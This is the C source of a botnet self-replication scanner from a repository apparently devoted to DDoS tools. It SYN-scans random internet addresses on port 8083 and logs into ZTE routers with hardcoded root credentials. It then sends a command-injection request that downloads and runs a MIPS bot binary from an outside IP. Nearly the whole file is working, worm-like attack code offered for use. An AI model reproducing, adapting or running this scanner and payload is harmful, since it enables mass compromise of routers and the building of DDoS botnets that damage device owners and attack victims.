CoCalc -- zte

GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Self Reps/ZTE/zte_scan.c
⁵⁰³⁸ views
1
#define _GNU_SOURCE
2

3
#ifdef DEBUG
4
    #include <stdio.h>
5
#endif
6
#include <unistd.h>
7
#include <stdlib.h>
8
#include <sys/socket.h>
9
#include <arpa/inet.h>
10
#include <sys/select.h>
11
#include <sys/types.h>
12
#include <time.h>
13
#include <fcntl.h>
14
#include <signal.h>
15
#include <errno.h>
16
#include <string.h>
17
#include <linux/ip.h>
18
#include <linux/tcp.h>
19

20
#include "includes.h"
21
#include "zte_scan.h"
22
#include "table.h"
23
#include "rand.h"
24
#include "util.h"
25
#include "checksum.h"
26

27
int ztescanner_scanner_pid = 0, ztescanner_scanner_pid2 = 0, ztescanner_rsck = 0, ztescanner_rsck_out = 0;
28
char ztescanner_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};
29
struct ztescanner_scanner_connection *conn_table;
30
uint32_t ztescanner_fake_time = 0;
31

32
int zte_ranges[] = {5,213,188,121,176,79,89,37,46,141,178,193,62,77};
33

34

35
int ztescanner_recv_strip_null(int sock, void *buf, int len, int flags)
36
{
37
    int ret = recv(sock, buf, len, flags);
38

39
    if(ret > 0)
40
    {
41
        int i = 0;
42

43
        for(i = 0; i < ret; i++)
44
        {
45
            if(((char *)buf)[i] == 0x00)
46
            {
47
                ((char *)buf)[i] = 'A';
48
            }
49
        }
50
    }
51

52
    return ret;
53
}
54

55
void ztescanner_scanner_init(int id)
56
{
57
    int i = 0;
58
    uint16_t source_port;
59
    struct iphdr *iph;
60
    struct tcphdr *tcph;
61

62
    // Let parent continue on main thread
63
    if(id == 1) ztescanner_scanner_pid = fork();
64
	else if(id == 2) ztescanner_scanner_pid2 = fork();
65
	
66
	if (id == 1 && ztescanner_scanner_pid > 0 || ztescanner_scanner_pid == -1) return;
67
    else if (id == 2 && ztescanner_scanner_pid2 > 0 || ztescanner_scanner_pid2 == -1) return;
68

69

70
    LOCAL_ADDR = util_local_addr();
71

72
    ztescanner_fake_time = time(NULL);
73
    conn_table = calloc(ztescanner_SCANNER_MAX_CONNS, sizeof(struct ztescanner_scanner_connection));
74
    for(i = 0; i < ztescanner_SCANNER_MAX_CONNS; i++)
75
    {
76
        conn_table[i].state = ztescanner_SC_CLOSED;
77
        conn_table[i].fd = -1;
78
    }
79

80
    // Set up raw socket scanning and payload
81
    if((ztescanner_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
82
    {
83
        #ifdef DEBUG
84
            printf("[zte] failed to initialize raw socket, cannot scan\n");
85
        #endif
86
        exit(0);
87
    }
88
    fcntl(ztescanner_rsck, F_SETFL, O_NONBLOCK | fcntl(ztescanner_rsck, F_GETFL, 0));
89
    i = 1;
90
    if(setsockopt(ztescanner_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)
91
    {
92
        #ifdef DEBUG
93
            printf("[zte] failed to set IP_HDRINCL, cannot scan\n");
94
        #endif
95
        close(ztescanner_rsck);
96
        exit(0);
97
    }
98

99
    do
100
    {
101
        source_port = rand_next() & 0xffff;
102
    }
103
    while(ntohs(source_port) < 1024);
104

105
    iph = (struct iphdr *)ztescanner_scanner_rawpkt;
106
    tcph = (struct tcphdr *)(iph + 1);
107

108
    // Set up IPv4 header
109
    iph->ihl = 5;
110
    iph->version = 4;
111
    iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));
112
    iph->id = rand_next();
113
    iph->ttl = 64;
114
    iph->protocol = IPPROTO_TCP;
115

116
    // Set up TCP header
117
    tcph->dest = htons(8083);
118
    tcph->source = source_port;
119
    tcph->doff = 5;
120
    tcph->window = rand_next() & 0xffff;
121
    tcph->syn = TRUE;
122

123
    #ifdef DEBUG
124
        printf("[zte] scanner process initialized. scanning started.\n");
125
    #endif
126

127
    // Main logic loop
128
    while(TRUE)
129
    {
130
        fd_set fdset_rd, fdset_wr;
131
        struct ztescanner_scanner_connection *conn;
132
        struct timeval tim;
133
        int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;
134

135
        // Spew out SYN to try and get a response
136
        if(ztescanner_fake_time != last_spew)
137
        {
138
            last_spew = ztescanner_fake_time;
139

140
            for(i = 0; i < ztescanner_SCANNER_RAW_PPS; i++)
141
            {
142
                struct sockaddr_in paddr = {0};
143
                struct iphdr *iph = (struct iphdr *)ztescanner_scanner_rawpkt;
144
                struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
145

146
                iph->id = rand_next();
147
                iph->saddr = LOCAL_ADDR;
148
                iph->daddr = ztescanner_get_random_ip();
149
                iph->check = 0;
150
                iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));
151

152
                tcph->dest = htons(8083);
153
                tcph->seq = iph->daddr;
154
                tcph->check = 0;
155
                tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));
156

157
                paddr.sin_family = AF_INET;
158
                paddr.sin_addr.s_addr = iph->daddr;
159
                paddr.sin_port = tcph->dest;
160

161
                sendto(ztescanner_rsck, ztescanner_scanner_rawpkt, sizeof(ztescanner_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));
162
            }
163
        }
164

165
        // Read packets from raw socket to get SYN+ACKs
166
        last_avail_conn = 0;
167
        while(TRUE)
168
        {
169
            int n = 0;
170
            char dgram[1514];
171
            struct iphdr *iph = (struct iphdr *)dgram;
172
            struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
173
            struct ztescanner_scanner_connection *conn;
174

175
            errno = 0;
176
            n = recvfrom(ztescanner_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);
177
            if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
178
                break;
179

180
            if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))
181
                continue;
182
            if(iph->daddr != LOCAL_ADDR)
183
                continue;
184
            if(iph->protocol != IPPROTO_TCP)
185
                continue;
186
            if(tcph->source != htons(8083))
187
                continue;
188
            if(tcph->dest != source_port)
189
                continue;
190
            if(!tcph->syn)
191
                continue;
192
            if(!tcph->ack)
193
                continue;
194
            if(tcph->rst)
195
                continue;
196
            if(tcph->fin)
197
                continue;
198
            if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
199
                continue;
200

201
            conn = NULL;
202
            for(n = last_avail_conn; n < ztescanner_SCANNER_MAX_CONNS; n++)
203
            {
204
                if(conn_table[n].state == ztescanner_SC_CLOSED)
205
                {
206
                    conn = &conn_table[n];
207
                    last_avail_conn = n;
208
                    break;
209
                }
210
            }
211

212
            // If there were no slots, then no point reading any more
213
            if(conn == NULL)
214
                break;
215

216
            conn->dst_addr = iph->saddr;
217
            conn->dst_port = tcph->source;
218
            ztescanner_setup_connection(conn);
219
        }
220

221
        FD_ZERO(&fdset_rd);
222
        FD_ZERO(&fdset_wr);
223

224
        for(i = 0; i < ztescanner_SCANNER_MAX_CONNS; i++)
225
        {
226
            int timeout = 5;
227

228
            conn = &conn_table[i];
229
            //timeout = (conn->state > ztescanner_SC_CONNECTING ? 30 : 5);
230

231
            if(conn->state != ztescanner_SC_CLOSED && (ztescanner_fake_time - conn->last_recv) > timeout)
232
            {
233
                close(conn->fd);
234
                conn->fd = -1;
235
                conn->state = ztescanner_SC_CLOSED;
236
                util_zero(conn->rdbuf, sizeof(conn->rdbuf));
237

238
                continue;
239
            }
240

241
            if(conn->state == ztescanner_SC_CONNECTING || conn->state == ztescanner_SC_EXPLOIT_STAGE2 || conn->state == ztescanner_SC_EXPLOIT_STAGE3)
242
            {
243
                FD_SET(conn->fd, &fdset_wr);
244
                if(conn->fd > mfd_wr)
245
                    mfd_wr = conn->fd;
246
            }
247
            else if(conn->state != ztescanner_SC_CLOSED)
248
            {
249
                FD_SET(conn->fd, &fdset_rd);
250
                if(conn->fd > mfd_rd)
251
                    mfd_rd = conn->fd;
252
            }
253
        }
254

255
        tim.tv_usec = 0;
256
        tim.tv_sec = 1;
257
        nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
258
        ztescanner_fake_time = time(NULL);
259

260
        for(i = 0; i < ztescanner_SCANNER_MAX_CONNS; i++)
261
        {
262
            conn = &conn_table[i];
263

264
            if(conn->fd == -1)
265
                continue;
266

267
            if(FD_ISSET(conn->fd, &fdset_wr))
268
            {
269
                int err = 0, ret = 0;
270
                socklen_t err_len = sizeof(err);
271

272
                ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
273
                if(err == 0 && ret == 0)
274
                {
275
                    if(conn->state == ztescanner_SC_EXPLOIT_STAGE2)
276
                    {
277
                        #ifdef DEBUG
278
                            printf("[zte] FD%d sending payload\n", conn->fd);
279
                        #endif
280

281
						
282
						// Login Request
283
                        util_strcpy(conn->payload_buf, "POST /login.gch HTTP/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: */*\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.");
284
                        send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);
285
                        util_zero(conn->payload_buf, sizeof(conn->payload_buf));
286
						sleep(1);
287
						// Command Injection
288
						util_strcpy(conn->payload_buf, "POST /manager_dev_ping_t.gch HTTP/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: */*\r\n\r\n&Host=;$(cd /tmp; rm -rf *; wget http://212.60.5.149/bins/amen.mips; chmod 777 amen.mips; ./amen.mips selfrep.zte)&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit");
289
                        send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);
290
                        util_zero(conn->payload_buf, sizeof(conn->payload_buf));
291
						sleep(1);
292
						// Logout Request
293
						util_strcpy(conn->payload_buf, "POST /getpage.gch?pid=1001&logout=1 HTTP/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: */*\r\n\r\nbroke bitches");
294
                        send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);
295
                        util_zero(conn->payload_buf, sizeof(conn->payload_buf));
296
						
297
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));
298

299
                        close(conn->fd);
300
                        ztescanner_setup_connection(conn);
301
                        conn->state = ztescanner_SC_EXPLOIT_STAGE3;
302

303
                        continue;
304
                    }
305
                    else if(conn->state == ztescanner_SC_EXPLOIT_STAGE3)
306
                    {
307
                        #ifdef DEBUG
308
                            printf("[zte] FD%d finnished\n", conn->fd);
309
                        #endif
310

311
                        close(conn->fd);
312
                        conn->fd = -1;
313
                        conn->state = ztescanner_SC_CLOSED;
314

315
                        continue;
316
                    }
317
                    else
318
                    {
319
                        #ifdef DEBUG
320
                            printf("[zte] FD%d connected to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);
321
                        #endif
322

323
                        conn->state = ztescanner_SC_EXPLOIT_STAGE2;
324
                    }
325
                }
326
                else
327
                {
328
                    close(conn->fd);
329
                    conn->fd = -1;
330
                    conn->state = ztescanner_SC_CLOSED;
331

332
                    continue;
333
                }
334
            }
335

336
            if(FD_ISSET(conn->fd, &fdset_rd))
337
            {
338
                while(TRUE)
339
                {
340
                    int ret = 0;
341

342
                    if(conn->state == ztescanner_SC_CLOSED)
343
                        break;
344

345
                    if(conn->rdbuf_pos == ztescanner_SCANNER_RDBUF_SIZE)
346
                    {
347
                        memmove(conn->rdbuf, conn->rdbuf + ztescanner_SCANNER_HACK_DRAIN, ztescanner_SCANNER_RDBUF_SIZE - ztescanner_SCANNER_HACK_DRAIN);
348
                        conn->rdbuf_pos -= ztescanner_SCANNER_HACK_DRAIN;
349
                    }
350

351
                    errno = 0;
352
                    ret = ztescanner_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, ztescanner_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
353
                    if(ret == 0)
354
                    {
355
                        errno = ECONNRESET;
356
                        ret = -1;
357
                    }
358
                    if(ret == -1)
359
                    {
360
                        if(errno != EAGAIN && errno != EWOULDBLOCK)
361
                        {
362
                            if(conn->state == ztescanner_SC_EXPLOIT_STAGE2)
363
                            {
364
                                close(conn->fd);
365
                                ztescanner_setup_connection(conn);
366
                                continue;
367
                            }
368

369
                            close(conn->fd);
370
                            conn->fd = -1;
371
                            conn->state = ztescanner_SC_CLOSED;
372
                            util_zero(conn->rdbuf, sizeof(conn->rdbuf));
373
                        }
374
                        break;
375
                    }
376

377
                    conn->rdbuf_pos += ret;
378
                    conn->last_recv = ztescanner_fake_time;
379

380
                    int len = util_strlen(conn->rdbuf);
381
                    conn->rdbuf[len] = 0;
382
                }
383
            }
384
        }
385
    }
386
}
387

388
void ztescanner_scanner_kill(int id)
389
{
390
    if(id == 1) kill(ztescanner_scanner_pid, 9);
391
	if(id == 2) kill(ztescanner_scanner_pid2, 9);
392
	if(id == 0) { // 0 kills both
393
	    kill(ztescanner_scanner_pid, 9);
394
		kill(ztescanner_scanner_pid2, 9);
395
	}
396
}
397

398
static void ztescanner_setup_connection(struct ztescanner_scanner_connection *conn)
399
{
400
    struct sockaddr_in addr = {0};
401

402
    if(conn->fd != -1)
403
        close(conn->fd);
404

405
    if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
406
    {
407
        return;
408
    }
409

410
    conn->rdbuf_pos = 0;
411
    util_zero(conn->rdbuf, sizeof(conn->rdbuf));
412

413
    fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
414

415
    addr.sin_family = AF_INET;
416
    addr.sin_addr.s_addr = conn->dst_addr;
417
    addr.sin_port = conn->dst_port;
418

419
    conn->last_recv = ztescanner_fake_time;
420

421
    if(conn->state == ztescanner_SC_EXPLOIT_STAGE2 || conn->state == ztescanner_SC_EXPLOIT_STAGE3)
422
    {
423
    }
424
    else
425
    {
426
        conn->state = ztescanner_SC_CONNECTING;
427
    }
428

429
    connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
430
}
431

432
static ipv4_t ztescanner_get_random_ip(void)
433
{
434
    uint32_t tmp;
435
    uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;
436

437
    do
438
    {
439
        tmp = rand_next();
440

441
        o1 = (zte_ranges[rand() % (sizeof(zte_ranges) / sizeof(zte_ranges[0]))]) & 0xff;
442
        o2 = (tmp >> 8) & 0xff;
443
        o3 = (tmp >> 16) & 0xff;
444
        o4 = (tmp >> 24) & 0xff;
445
    }
446
    while(o1 == 127 ||                             // 127.0.0.0/8      - Loopback
447
          (o1 == 0) ||                              // 0.0.0.0/8        - Invalid address space
448
          (o1 == 3) ||                              // 3.0.0.0/8        - General Electric Company
449
          (o1 == 15 || o1 == 16) ||                 // 15.0.0.0/7       - Hewlett-Packard Company
450
          (o1 == 56) ||                             // 56.0.0.0/8       - US Postal Service
451
          (o1 == 10) ||                             // 10.0.0.0/8       - Internal network
452
          (o1 == 192 && o2 == 168) ||               // 192.168.0.0/16   - Internal network
453
          (o1 == 172 && o2 >= 16 && o2 < 32) ||     // 172.16.0.0/14    - Internal network
454
          (o1 == 100 && o2 >= 64 && o2 < 127) ||    // 100.64.0.0/10    - IANA NAT reserved
455
          (o1 == 169 && o2 > 254) ||                // 169.254.0.0/16   - IANA NAT reserved
456
          (o1 == 198 && o2 >= 18 && o2 < 20) ||     // 198.18.0.0/15    - IANA Special use
457
          (o1 >= 224) ||                            // 224.*.*.*+       - Multicast
458
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
459
    );
460

461
	return INET_ADDR(o1,o2,o3,o4);
462

463
}
464

465

466
Product

Resources

Company
